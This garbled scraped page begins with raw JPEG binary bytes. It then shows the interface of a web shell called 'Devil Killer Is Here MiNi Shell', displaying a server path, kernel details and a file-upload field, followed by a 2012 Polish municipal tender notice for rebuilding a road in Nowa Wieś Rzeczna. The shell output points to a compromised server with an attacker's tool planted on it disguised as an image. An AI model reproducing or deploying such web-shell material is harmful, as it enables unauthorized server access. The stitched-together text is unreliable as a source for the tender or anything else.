JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/36164-N-2012.html

<p class="kh_header"><b>Starogard Gdański: Przebudowa drogi Nr 213024 - ul. Rzecznej w miejscowości Nowa Wieś Rzeczna , Gmina Starogard Gd.</b><br>
<b>Numer ogłoszenia: 36164 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Starogard Gdański , ul. Sikorskiego 9, 83-200 Starogard Gdański, woj. pomorskie, tel. (058) 562 50 67, faks (058) 562 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starogardgd.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi Nr 213024 - ul. Rzecznej w miejscowości Nowa Wieś Rzeczna , Gmina Starogard Gd..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na  przebudowie  drogi gminnej,  zmianie trasy linii kablowych , budowie chodników oraz  kanalizacji deszczowej,  ul. Rzecznej w miejscowości Nowa Wieś Rzeczna, gm. Starogard Gd. 
W pasie drogowym występuje następujące uzbrojenie podziemne :
- sieć wodociągowa,
- sieć energetyczna,
- sieć gazowa,
- kanalizacja sanitarna
- kabel telekomunikacyjny
Zamówienie jest kolejnym - ostatnim etapem zadania inwestycyjnego realizowanego na podstawie decyzji pozwolenia na budowę z dnia 31.08.2005r. 
W poprzednich etapach , zrealizowano zgodnie z projektem budowlanym następujący zakres robót budowlanych :
- jezdnia drogi gminnej o nawierzchni asfaltobetonowej od km 0+000 do km 0+486
- zjazd z drogi gminnej na dz. nr 191 (ul. Leśna ) w km 0+500
- chodnik po jednej stronie ulicy o szer. 1,35m od km 0+541 do km  0+795   

Zakres prac do wykonania: 

a) Branża drogowa

- budowa chodnika po jednej stronie ulicy o szer. 2,0m od km 0+000 do km 0+512
- budowa chodnika po jednej stronie ulicy o szer. 1,35m od km 0+660 do km 0+802                            
   i od km 0+928 do km 1+314
- budowa chodnika po obu stronach ulicy o szer. 1,35m od km 0+802 do km 0+928
- budowa zatoki autobusowej przy drodze gminnej o szer. 3,0m  od km 0+660 do km 0+720
- przebudowa istniejącej pętli autobusowej znajdującej się od km 1+160 do km 1+205
- remont jezdni asfaltowej w istniejącej szerokości 5,5m - 6,0m od km 0+486 do km 1+344 
- wykonanie oznakowania pionowego i poziomego przebudowywanej drogi

 Przyjęto następujące założenia techniczne dla drogi:
-Kategoria ruchu - KR 1
-Szerokość pasa jezdni  :   5,5 - 6,0m
-Szerokość chodników : 1,35 - 2,0m.
-Jezdnia ograniczona krawężnikiem ulicznym 15x30 cm. na ławie betonowej z oporem
-Zjazdy na posesje indywidualne i drogi publiczne o szer. zgodnej z normami i projektem budowlanym, umożliwiające bezpieczne włączenie się do ruchu przez nowych użytkowników

1. KONSTRUKCJA NAWIERZCHNI  DROGI GMINNEJ NA ODCINKU
    OD KM 0+486 DO KM 1+344
1.	Beton asfaltowy grysowy ścisły 0/12,8	gr. 4cm	w-wa ścieralna
2.	Beton asfaltowy półścisły 0/16	gr. 3 - 10(11)cm	w-wa wyrównawcza
3.	Istniejąca nawierzchnia asfaltobetonowa

2. KONSTRUKCJA  ZJAZDÓW INDYWIDUALNYCH
1.	Kostka betonowa czerwona	gr. 8cm	w-wa ścieralna
2.	Warstwa  podsypki  cementowo - piaskowej 1:4	gr. 3cm	 
3.	Warstwa podbudowy pomocniczej z tłucznia kamiennego	gr. 15cm	pod. zasadnicza
4	Warstwa odcinająca piaskowa 	gr.10cm	pod. pomocnicza

3. KONSTRUKCJA ZJAZDÓW PUBLICZNYCH
1.	Kostka betonowa czerwona	gr. 8cm	w-wa ścieralna
2.	Warstwa  podsypki  cementowo - piaskowej 1:4	gr. 3cm	
3.	Warstwa podbudowy pomocniczej z tłucznia kamiennego 	gr. 20cm	pod. zasadnicza
4.	 Warstwa odcinająca piaskowa	gr. 15cm	w-wa odcinająca

5. KONSTRUKCJA CHODNIKÓW
1.	Kostka betonowa szara	gr. 6cm	w-wa ścieralna
2.	Podsypka cementowo-piaskowa 1:4 	gr. 3cm	
3.	Podsypka piaskowa 	gr. 10cm	w-wa odcinająca

6. KONSTRUKCJA  PĘTLI ORAZ ZATOKI AUTOBUSOWEJ
1.	Kostka betonowa szara	gr. 8cm	w-wa ścieralna
2.	Podsypka cementowo-piaskowa	gr. 3cm	
3.	Podbudowa z betonu cementowego  B 20 	gr. 22cm	pod. zasadnicza

b)	Kanalizacja deszczowa

   Od km 0+000 do km 0+485 droga odwadniana powierzchniowo do projektowanego rowu przydrożnego, pełniącego rolę muldy chłonno - odparowującej , uzupełnionej w km 0+002 studnią chłonną z kręgów żelbetowych fi 1,60m i głębokości 3,5m..
Od km 0+485 odwodnienie drogi zapewniają spadki poprzeczne i podłużne dróg ściekiem przykrawężnikowym do projektowanych wpustów ulicznych.  Dla odprowadzenia ścieków zaprojektowano kanalizację deszczową dla średnic fi 250 i fi 300 z rur PCV fi 250*7,3mm kielichowych i z rur PCV fi 315*9,2mm kielichowych i kształtek kielichowych łączonych na uszczelki gumowe. Podłączenia przykanalików pod wpusty uliczne wykonać z rur PCV Dn 160*4,7 i Dn 200*5,9 i kształtek kielichowych łączonych na uszczelki gumowe.
	Na trasie projektowanego kanału deszczowego przewiduje się studnie rewizyjne betonowe fi 1200 .  Studzienki kanalizacyjne z elementów żelbetowych należy wykonać w konstrukcji mieszanej monolityczno - prefabrykowanej zgodnie z wymogami normy PN-92/B-10729. Dno studzienki należy wykonać na mokro w formie płyty dennej z betonu B-25 na zagęszczonej podsypce piaskowej grubości ok. 0,15m. W dnie uformować kinety o przekroju zgodnym ze średnicą kanałów dopływowych i spadkiem w kierunku odpływu ścieków. Elementy prefabrykowane : kręgi żelbetowe i płyty pokrywowe, zależnie od ciężaru można układać ręcznie lub przy użyciu sprzętu montażowego. Żeliwne włazy kanałowe należy  montować na płycie pokrywowej, typy włazów : DO-600P.H115 z przykręcaną  pokrywą klasy D400  (ograniczającą kradzież włazów) . Ścianki zewnętrzne studzienek należy zaizolować Abizolem R i Abizolem P. Izolacja powinna stanowić szczelną, jednolitą powłokę, trwale przylegającą do ścian . Połączenie rur PCV ze studnią należy wykonać poprzez tuleję ochronną zamontowaną w ścianie studni. Studzienki i wpusty posadowić sztywno na podsypce przygotowanej tak jak pod rurociąg. Wpusty uliczne wykonać z osadnikiem gł. 800mm. Roboty ziemne związane z układaniem i montażem rur kanalizacyjnych z PVC należy wykonać zgodnie z ustaleniami normy branżowej BN-83/8836-02 i PN-B/060500. Jeżeli wystąpią wody gruntowe należy odwodnienie wykopu wykonać za pomocą igłofiltrów. Czynności zgodnie z BN-83/8836-02 p.2.9.
Przewiduje się zainstalowanie urządzeń podczyszczających - SEPARATOR WĘGLOWODORÓW KOALESCENCYJNY TYPOSZEREG wykonany w studni cylindrycznej zintegrowanej z osadnikiem piasku ( parametry techniczne : średnica studni Dw=2000mm, pojemność części osadowej Vos=~~2,0m3, przepustowość minimalna Qn=15l/s , które zapewnią stopień podczyszczenia , zgodnie z Rozporządzeniem Ministra Środowiska z dnia 08.07.2004r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. Nr 168, poz. 1763).

Na istniejącym odcinku kanalizacji deszczowej przewiduje się :
- budowę nowych studni rewizyjnych o śr. 1200mm - szt. 7 (D2,D3,D4, D6, D7, D9,D10) , 
- budowę ww. separatora zintegrowanego z osadnikiem piasku - szt.1 (OS)
- wyniesienie istniejących studni do rzędnych terenu wraz z wymianą istniejących pokryw  
  betonowych na nowe wraz z żeliwnymi włazami kanałowymi - szt.2  (D5, D8,D11)
- wymianę na nowe, istniejących rurociągów betonowych o śr. 600mm - 20mb, (po  
   wbudowaniu studni)
- wymianę na nowe, istniejących rurociągów betonowych o śr. 400mm - 20mb, (po  
   wbudowaniu studni)
- wymianę na nowy istniejącego rurociągu Dn 400 - 52m (pomiędzy D10 - D11),
- przeczyszczenie istniejącego rurociągu betonowego  o śr. 400 - 600mm od studni D10 do 
  wylotu kanalizacji deszczowej W1
Ponadto należy :
- oczyścić istniejący wylot kanalizacji deszczowej W1,
- odmulić dno rowu do rzeki,
- zabezpieczyć skarpy i dno rowu narzutami z kamieni (rys. nr 13)

Na projektowanym odcinku kanalizacji deszczowej przewiduje się :
- budowę studni rewizyjnych o śr. 1200mm - szt. 19 (D12 - D30)
- budowę wpustów ulicznych betonowych - szt. 20 (W1 - W20)
- budowę rurociągu DN 300 - 502m,
- budowę rurociągu Dn 250 - 110,5m,
- budowę rurociągu Dn 200 - 11,5m,
- budowę rurociągu Dn160 - 64,60m,
 
c)	Zmiana trasy linii kablowych 

W poprzednich etapach realizacji projektu przebudowy ul. Rzecznej zlikwidowano kolizję linii kablowej na odcinku A-B-C - stacja transformatorowa nr T-61790-złącze kablowe WZ1200 - złącze kablowe WZ2200.
Obecnie z projektowaną przebudową koliduje linia kablowa na odcinku O - D - stacja transformatorowa nr T-60918 - złącze kablowe Z1600. Przed rozpoczęciem prac związanych z niwelacją drogi na odcinku od punktu D (1015m) do punktu O(1017m) wykonać dwa poprzeczne wykopy. Po wykonaniu wykopów określić rzędną posadowienia istniejącej linii kablowej. Po wykonaniu niwelacji terenu wykonać prace montażowe związane z przesunięciem linii kablowej wg planu. Kable ułożyć po wytyczonej trasie przez służbę geodezyjną na podstawie planu realizacyjnego. Kabel układać na głębokości 0,7m. Kable układać na posypce z piasku o gr. min. 0,1m , następnie zasypać warstwą piasku o gr. 0,1m. W wykopie ułożyć folię niebieską z tworzywa sztucznego o szer. 0,3m nad kablem (0.15m). Wykopy wykonać ręcznie i zachować właściwą odległość od innych urządzeń podziemnych. Pod wjazdami na posesje kabel układać w rurze ochronnej . Po zakończeniu prac montażowych należy wykonać badania skuteczności ochrony od porażeń.
Zgodnie z dokumentacją projektową należy przełożyć istniejącą linię kablowa TP SA na odcinku K - L o długości l=311m. W miejscu zjazdu publicznego (na ul. Brejskiego) linię kablową ułożyć w rurze osłonowej dwudzielnej.
Rury osłonowe wbudować w miejscach zaznaczonych w dokumentacji projektowej                                                                                                   d)	Istniejąca sieć gazowa
- wykonanie zabezpieczenia gazociągu w obrębie pętli autobusowej rurą ochronną PEDy 160 (rys. nr 11), L=15m - 1kpl.
- wykonanie dodatkowego zabezpieczenia gazociągu rurą ochronną PEDy 160 (rys. nr 11) L=15m - 2kpl. ( w obrębie prowadzonej przebudowy drogi)


e)	Dostawa i montaż wiat przystankowych - szt.2

Przewiduje się dostawę i montaż wiat przystankowych o następujących parametrach technicznych:
- wymiary zewnętrzne ~~ 3500mmx1400mm,
- konstrukcja stalowa, ocynkowana, malowana w kolorze zielonym wg palety RAL 6005
- szkielet dachu półokrągły, przykryty płytami z poliwęglanu komorowego
- ściana tylnia oraz ściany boczne oszklone szybą hartowaną gr. 8mm
- siedzisko ławki o dł. ~~2500 mm wykonane z białego laminatu
- fundamenty wiaty wykonać zgodnie z wytycznymi producenta
Ponadto należy uwzględnić utwardzenie terenu z kostki betonowej w ilości 12m2       ( plac o wym. 4x3m , z wbudowanym po obwodzie krawężniku , konstrukcja podbudowy jak dla zjazdu publicznego)

f)	Wykonanie docelowej organizacji ruchu na drodze gminnej 
Oznakowanie pionowe:
-dostawa i montaż 6 znaków informacyjnych D-6 ( przejście dla pieszych),
- dostawa i montaż 2 znaków D-15 (przystanek autobusowy),
- dostawa i montaż 2 znaków zakazu B-33 (ograniczenie prędkości),
- dostawa i montaż 4 znakow B-2 (zakaz wjazdu), w tym 2 z tabliczką nie dotyczy  
   autobusów,
Oznakowanie poziome:
-  linia przerywana krótka,  P-1b , na dł. 1344m,
- przejście dla pieszych,  P-10,  3 szt.

g)	Wykonanie organizacji ruchu na czas prowadzenia robót zapewniającej stały dojazd do posesji znajdujących się wzdłuż budowanej drogi lub mających dostęp z tej drogi, a także na przebudowywanym skrzyżowaniu z drogą wojewódzką. Projekt organizacji ruchu na czas prowadzenia robot na drodze wojewódzkiej opracowany przez Zamawiającego

Ponadto przedmiot zamówienia obejmuje wykonanie:
a)	Roboty rozbiórkowe niezbędne do prawidłowej realizacji zamówienia .
b)	Wywóz i utylizację materiałów rozbiórkowych.
c)	Regulację istniejących studzienek teletechnicznych, wodociągowych i gazowych.                                                                                
d)	Kompleksową inwentaryzację powykonawczą wykonanych robót oraz zapewnienie bieżącej obsługi geodezyjnej
e)	Organizacja i urządzenie placu budowy, w tym wszelkie roboty przygotowawcze, zagospodarowanie placu budowy, koszty utrzymania zaplecza budowy, organizacji ruchu w okresie prowadzenia robót, obsługi geodezyjnej i geotechnicznej, ewentualna odbudowa osnowy geodezyjnej lub kamieni granicznych usuniętych w trakcie robot budowlanych, wykonania tymczasowych przyłączy lub liczników dla mediów niezbędnych do realizacji prac budowlanych, opłat za pobór wody i energii na czas prowadzenia robót
f)	Zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów oraz ewentualnego uzupełnienia dokumentacji odbiorczej dla zakresu robót objętych przedmiotem przetargu,  wykonanie dokumentacji powykonawczej (operatu kolaudacyjnego) 
g)	po zakończeniu robót demontaż obiektów tymczasowych oraz uporządkowanie terenu,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każdy Wykonawca przystępujący do przetargu obowiązany jest wnieść wadium w wysokości 50 000 PLN przed upływem terminu składania ofert.
2. Wadium może być wnoszone zgodnie z zapisami dotyczącymi form wnoszenia wadium wynikającymi z zapisów art. 45 pkt 6 - Ustawy - Prawo zamówień publicznych.
3. Termin ważności wadium nie może być krótszy niż termin związania ofertą, 30 dni od terminu składania ofert
4. W przypadku, kiedy wadium jest wnoszone w pieniądzu, należy je wpłacić przelewem z dopiskiem Wadium na Przetarg - Przebudowa drogi Nr 213024 - ul. Rzecznej w miejscowości Nowa Wieś Rzeczna , Gmina Starogard Gd.   , na następujące konto: Bank Spółdzielczy Starogard Gdański konto nr 35834000010004684820000005.
Wadium wnoszone w pieniądzu uznaje się za wniesione skutecznie w terminie określonym w SIWZ w momencie zaksięgowania jego wpływu na konto zamawiającego.
5. W przypadku wnoszenia wadium w innych formach niż pieniądz należy oryginał dokumentu zabezpieczającego wadium złożyć w kasie w siedzibie Zamawiającego w Starogardzie Gd. ul. Sikorskiego 9,  Kasa  - otwarta w godzinach 8.00-13.00
6. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
7. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesienia zabezpieczenia należytego wykonania umowy.
8. Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46 ust. 4a i 5  Ustawy -Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać iż w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, Wykonawca zrealizował co najmniej 1 robotę budowaną polegającą na budowie drogi o nawierzchni bitumicznej długości co najmniej 0,5 km.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami z uprawnieniami budowlanymi do kierowania robotami w branży drogowej, sanitarnej, elektrycznej  i teletechnicznej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 300 tys. złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

